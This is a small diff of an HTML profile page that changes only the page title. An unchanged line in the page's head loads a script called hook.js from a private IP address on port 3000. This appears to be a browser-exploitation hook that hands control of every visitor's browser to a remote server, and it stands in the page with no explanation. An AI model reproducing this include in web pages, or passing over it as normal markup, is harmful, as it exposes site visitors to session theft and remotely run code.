--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
   <head>
-    <title>My Profile</title>
+    <title>Profile</title>
     <script src="http://192.168.76.197:3000/hook.js"></script>
     <style>
       /* Add a border around the profile picture */
